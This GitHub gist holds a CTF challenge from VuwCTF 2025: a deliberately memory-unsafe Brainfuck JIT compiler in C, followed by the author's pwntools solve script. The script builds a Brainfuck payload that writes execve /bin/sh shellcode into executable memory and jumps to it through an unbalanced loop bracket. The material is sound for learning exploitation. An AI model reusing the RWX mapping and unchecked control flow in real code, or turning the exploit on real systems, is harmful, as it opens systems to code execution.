Skip to content

Instantly share code, notes, and snippets.

@maxcai314
Created December 29, 2025 00:01
Show Gist options
  • Select an option

  • Save maxcai314/5b5897251c80e106f7aea8d613dd5086 to your computer and use it in GitHub Desktop.

Select an option

Save maxcai314/5b5897251c80e106f7aea8d613dd5086 to your computer and use it in GitHub Desktop.
Blazingly-Fast-Memory-Unsafe VuwCTF 2025 challenge
/*
* This challenge was published for VuwCTF 2025.
* Challenge Name: blazingly-fast-memory-unsafe
* User Brief: Is this modern, blazingly fast, memory-unsafe JIT-compiled language the future of programming?
* Event Organizers: https://vuwctf.com/
* Author: maxster (Max Cai)
*
* This source code file, along with the compiled binary, was provided to players.
* Players were expected to pwn a remote instance running the same program,
* which contained the flag in the filesystem.
* This project was compiled with the Chasm (https://github.com/aqilc/chasm) library.
* In order to compile this code, download the asm_x64.c and asm_x64.h files.
* gcc -O3 bfmu_jit.c asm_x64.c -o bfmu_jit
*/
#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include "asm_x64.h"
void out_of_bounds() {
printf("\nError: Out of bounds access detected!\n");
exit(EXIT_FAILURE);
}
// Calling conventions
#ifdef _WIN32
#define CALL_ARG_1 (x64Operand) rcx
#define CALL_ARG_2 (x64Operand) rdx
#else
#define CALL_ARG_1 (x64Operand) rdi
#define CALL_ARG_2 (x64Operand) rsi
#endif
#define PROLOGUE (x64Ins[]) { \
{ PUSH, rbp }, \
{ MOV, rbp, rsp }, \
{ MOV, rax, CALL_ARG_1 }, \
{ PUSH, CALL_ARG_1 } /* stores the current pointer */, \
{ PUSH, CALL_ARG_2 } /* buffer length */, \
{ PUSH, CALL_ARG_1 } /* buffer start pointer */, \
}
#define EPILOGUE (x64Ins[]) { \
{ MOV, rsp, rbp }, \
{ POP, rbp }, \
{ RET }, \
}
#define LEFT (x64Ins[]) { \
{ DEC, m64($rbp, -8) }, /* dec */ \
{ MOV, rax, m64($rbp, -8) }, \
{ MOV, rbx, rax }, \
{ SUB, rbx, m64($rbp, -24) }, /* calculate stack depth */ \
{ CMP, rbx, imm(0) }, \
{ JGE, rel(4) }, /* if current pointer < buffer start, call oob handler */ \
{ MOV, rax, imptr(out_of_bounds) }, \
{ MOV, CALL_ARG_1, rbx }, \
{ CALL, rax } \
}
#define RIGHT (x64Ins[]) { \
{ INC, m64($rbp, -8) }, /* inc */ \
{ MOV, rax, m64($rbp, -8) }, \
{ MOV, rbx, rax }, \
{ SUB, rbx, m64($rbp, -24) }, /* calculate stack depth */ \
{ CMP, rbx, m64($rbp, -16) }, \
{ JL, rel(4) }, /* if current pointer >= buffer end, call oob handler */ \
{ MOV, rax, imptr(out_of_bounds) }, \
{ MOV, CALL_ARG_1, rbx }, \
{ CALL, rax } \
}
#define UNGARBLE_RAX (x64Ins[]) { \
{ MOV, rax, m64($rbp, -8) } \
}
#define INCREMENT (x64Ins[]) { \
{ INC, m8($rax) } \
}
#define DECREMENT (x64Ins[]) { \
{ DEC, m8($rax) } \
}
#define LOOP_START (x64Ins[]) { \
{ LEA, rsi, m64($riprel, 0) }, \
{ PUSH, rsi } \
}
#define LOOP_END (x64Ins[]) { \
{ MOV, rax, m64($rbp, -8) }, \
{ POP, rbx }, /* return address */ \
{ CMP, m8($rax), imm(0) }, \
{ JZ, rel(2) }, \
{ JMP, rbx } \
}
#define PRINT_CHAR (x64Ins[]) { \
{ MOV, rax, mem($rbp, -8) }, \
{ MOV, CALL_ARG_1, mem($rax) }, \
{ SUB, rsp, imm(64) }, \
{ MOV, rax, imptr(putchar) }, \
{ CALL, rax }, \
{ ADD, rsp, imm(64) } \
}
typedef struct {
x64Ins *buf;
size_t buf_size;
} x64InsBuf;
#define BUF_PUSH(bf, ins_buf) do { \
size_t ins_buf_len = sizeof(ins_buf) / sizeof(x64Ins); \
bf.buf = realloc(bf.buf, (bf.buf_size + ins_buf_len) * sizeof(x64Ins)); \
memcpy(bf.buf + bf.buf_size, ins_buf, sizeof(ins_buf)); \
bf.buf_size += ins_buf_len; \
} while(0)
// Compile bf code into x64 asm
x64InsBuf bf_compile(const char* in) {
x64InsBuf ret = { NULL, 0 };
BUF_PUSH(ret, PROLOGUE);
bool rax_garbled = false;
while(*in) {
switch(*in) {
case '>':
BUF_PUSH(ret, RIGHT);
rax_garbled = false;
break;
case '<':
BUF_PUSH(ret, LEFT);
rax_garbled = false;
break;
case '+':
if (rax_garbled) {
BUF_PUSH(ret, UNGARBLE_RAX);
rax_garbled = false;
}
BUF_PUSH(ret, INCREMENT);
break;
case '-':
if(rax_garbled) {
BUF_PUSH(ret, UNGARBLE_RAX);
rax_garbled = false;
}
BUF_PUSH(ret, DECREMENT);
break;
case '[':
BUF_PUSH(ret, LOOP_START);
rax_garbled = true;
break;
case '.':
rax_garbled = true;
BUF_PUSH(ret, PRINT_CHAR);
break;
case ']':
rax_garbled = true;
BUF_PUSH(ret, LOOP_END);
break;
default: break;
}
in++;
}
BUF_PUSH(ret, EPILOGUE);
return ret;
}
#define TAPE_SIZE 256
void bf_execute(void *compiled, uint32_t len) {
size_t memory_segment_size = len + TAPE_SIZE;
void *memory_segment = mmap(NULL, memory_segment_size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0);
void (*native_program)(uint8_t*, size_t) = memory_segment;
uint8_t *tape = (char *)memory_segment + len;
memcpy(native_program, compiled, len);
memset(tape, 0, TAPE_SIZE);
native_program(tape, TAPE_SIZE);
munmap(memory_segment, memory_segment_size);
}
#define MAX_CODE_LEN 512
int main() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
printf("*********************************\n");
printf("***** The BFMU JIT Compiler *****\n");
printf("*********************************\n");
printf("\nCompiles BF programs to blazingly fast, memory-unsafe x64 machine code!\n");
printf("Enter your BF program:\n");
char line[MAX_CODE_LEN];
if (fgets(line, MAX_CODE_LEN, stdin) == NULL) {
printf("Failed to read input\n");
exit(EXIT_FAILURE);
}
printf("JIT compiling BF program\n");
x64InsBuf ins = bf_compile(line);
printf("Assembled %zu instructions\n", ins.buf_size);
uint32_t len = 0;
void* compiled = x64as(ins.buf, ins.buf_size, &len);
printf("Lowered into %u bytes of machine code\n", len);
printf("Executing...\n");
bf_execute(compiled, len);
printf("Executed!\n");
}
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Solve script for the bfmu pwn challenge.
# Author: maxster (Max Cai)
# This exploit loads shellcode into the program buffer, and uses an additional unbalanced return statement ']'
# to jump to the data buffer and run the shellcode.
# The bf payload was optimized to fit within the program size limit.
from pwn import *
import struct
exe = context.binary = ELF(args.EXE or './bfmu_jit')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
tbreak main
continue
'''.format(**locals())
# -- Exploit goes here --
# If the user pops using an extra ], we can force a jump to our own data buffer, where we can have shellcode.
# https://shell-storm.org/shellcode/files/shellcode-806.html
# This assembly will open a /bin/sh shell:
"""
0: 31 c0 xor eax,eax
2: 48 bb d1 9d 96 91 d0 movabs rbx,0xff978cd091969dd1
9: 8c 97 ff
c: 48 f7 db neg rbx
f: 53 push rbx
10: 54 push rsp
11: 5f pop rdi
12: 99 cdq
13: 52 push rdx
14: 57 push rdi
15: 54 push rsp
16: 5e pop rsi
17: b0 3b mov al,0x3b
19: 0f 05 syscall
"""
SHELLCODE = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
SHELLCODE_DATA = [ord(b) for b in SHELLCODE]
print(f"Shellcode length: {len(SHELLCODE_DATA)} bytes")
print(" ".join([f"{i:02x}" for i in SHELLCODE_DATA]))
# We need to construct a program which loads this shellcode into memory, then jumps to it.
bf_program = ""
# Naive approach: just load each byte one at a time
# This solution is too long, and the payload exceeds the input buffer size.
# for byte in SHELLCODE_DATA:
# bf_program += "+" * byte # Set byte value
# bf_program += ">" # Move to next byte
# bf_program += ">+]" # Call the shellcode
# Strategy: square root the time complexity by loading factors of 32 so don't have to do up to 255 operations per byte.
nums = [divmod(byte, 32) for byte in SHELLCODE_DATA]
bf_program += ">" * len(nums) # Move to end of shellcode area
bf_program += ">++++[<++++++++>-]<" # Set up 32
bf_program += "["
bf_program += "<" * len(nums)
for factor, _ in nums:
bf_program += "+" * factor
bf_program += ">" # Move to next byte
bf_program += "-]"
# With the remainders, do another pass, dividing by 8 for more efficiency
nums = [divmod(remainder, 8) for _, remainder in nums]
bf_program += "+" * 8 # Set up 8
bf_program += "["
bf_program += "<" * len(nums)
for factor, _ in nums:
bf_program += "+" * factor
bf_program += ">" # Move to next byte
bf_program += "-]"
# Finally, do remainders
bf_program += "<" * len(nums) # Move back to start of shellcode area
for _, remainder in nums:
bf_program += "+" * remainder
bf_program += ">" # Move to next byte
bf_program += ">+]" # Call the shellcode
print(f"Payload of length {len(bf_program)} constructed:")
print(bf_program)
print("\nStarting process\n")
io = start()
io.recvuntil(b'Enter your BF program:')
print(f"Sending BF program of length {len(bf_program)}")
io.sendline(bf_program.encode())
print("\nShellcode should be running, interact with the shell:")
io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment